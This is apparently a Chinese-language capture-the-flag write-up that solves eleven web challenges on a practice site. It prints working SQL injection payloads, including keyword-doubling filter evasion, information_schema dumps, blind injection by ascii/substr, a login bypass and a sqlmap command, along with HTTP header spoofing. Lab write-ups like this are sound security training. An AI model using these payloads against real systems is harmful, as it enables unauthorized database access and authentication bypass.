1.菊花
http://ctf1.simplexue.com/web/6/
提示:
Please make sure you have installed .net framework 9.9!
用burp拦截,修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9),下面的注入均在这个条件下进行
id=1 提示hacker:welcome to simplexue CTF
id=4提示hacker: don’t try again
id=0/**/ununionion/**/seselectlect/**/1,user(),database()
用户名和数据库名称:root@cuit-092a2b258a inject
<span style="font-size:14px;">id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--</span>simplexue: flag is SimCTF{xuectf}
2.Forbidden
http://ctf1.simplexue.com/basic/header/
提示:
You don't have permission to access /on this server.
Make sure you are in HongKong用burp拦截,修改为Accept-Language:zh-hk即可>KEY:123JustUserAGent
3.头有点大
http://ctf1.simplexue.com/web/1/index.asp?id=1提示:
You don't have permission to access / on this server.
Make sure you are in the region of England and browsing this site with Internet Explorer
用burp拦截修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)
Accept-Language:en-gb
The key is:HTTpH34der
4.请输入密码
http://ctf1.simplexue.com/basic/js/index.asp
用burp拦截
得到JAVAscript
<script type="text/javascript">
document.οncοntextmenu=function(){return false};
var a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
a = Math.floor(a);
function check(){
if(document.getElementById("txt").value==a){
return true;
}else{
alert("密码错误");
return false;
}
}
</script>
写C算出:
#include<stdio.h>
int main()
{
float a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
printf("%f",a);
return 0;
}
运算结果:424178.562500 输入:424178 弹出key=> @#$JSisagoodtool@#$
5.这个看起来有点简单
http://ctf5.simplexue.com/8/index.php?id=1
id=1'
id=1 and 1=1
id=1 and 1=2 判断是sql注入
id=1 order by 2 两个字节
id=1 union select 1,2 回显2
version(): 5.0.45-community-nt
database(): my_db
user(): phpsql@localhost
爆数据库:
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
information_schema my_db
爆表:
and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1
news thiskey
爆字段:
and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1
爆内容:
and 1=2 union select 1,k0y from thiskey
key=> whati0MyD9ldump
6.猫抓老鼠
http://ctf1.simplexue.com/basic/catch/查看http发现 Content-Row: MTQ0ODU0MzEyNA== 填入 MTQ0ODU0MzEyNA== =>KEY: #WWWnsf0cus_NET#
7.程序员的问题
http://ctf1.simplexue.com/web/4/index.php
查看源代码:
<?php
if($_POST[user] && $_POST[pass]) {
$conn = mysql_connect("*******", "****", "****");
mysql_select_db("****") or die("Could not select database");
if ($conn->connect_error) {
die("Connection failed: " . mysql_error($conn));
}
$user = $_POST[user];
$pass = md5($_POST[pass]);
$sql = "select user from php where (user='$user') and (pw='$pass')";
$query = mysql_query($sql);
if (!$query) {
printf("Error: %s\n", mysql_error($conn));
exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
if($row['user']=="admin") {
echo "<p>Logged in! Key: *********** </p>";
}
if($row['user'] != "admin") {
echo("<p>You are not admin!</p>");
}
}
?>
输入admin 提示 You are not admin! 于是想到闭合: 输入=> ')or 1=1# 得到 Key: WWW_SIMPLEXUE_COM
8.what a fuck!这是什么鬼东西?
http://ctf5.simplexue.com/DUTCTF/1.html有点晕,想到js加密,于是copy下来加上<script> </script> 弹出 Ihatejs
9.貌似有点难
http://ctf8.simplexue.com/phpaudit/
<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
$cip = $_SERVER["REMOTE_ADDR"];
else
$cip = "0.0.0.0";
return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>
http协议:
用burp拦截 加入 X-Forwarded-For: 1.1.1.1 伪造IP为: 1.1.1.1 => Key is http_client
10.进来就给你想要的
http://ctf1.simplexue.com/web/1/index.asp?id=1这题是找后台:
输入admin 查看源代码提示 =>呵呵,思路是对的哈,但是不在这儿。想想谁的权利最大
输入system =>KEY: "!!!WellDoneBrother!"
11.看起来有点难
http://ctf1.simplexue.com/basic/inject/
这题是盲注题
输入用户名:admin,密码随意,然后提交
提示:登录失败,错误的用户名和密码
然后这么玩:
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login
注:
ascii(str):把字符串转换为ascii码;substr(str,star,length)/substring(str,star,length):截取字符串(str字符串,star启始位置,length长度)
得到数据库:test
然后替换dabases();得到所有数据
注:这题过滤了select,用selselectect替换
用sqlmap这么来:
sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass=" -D test --table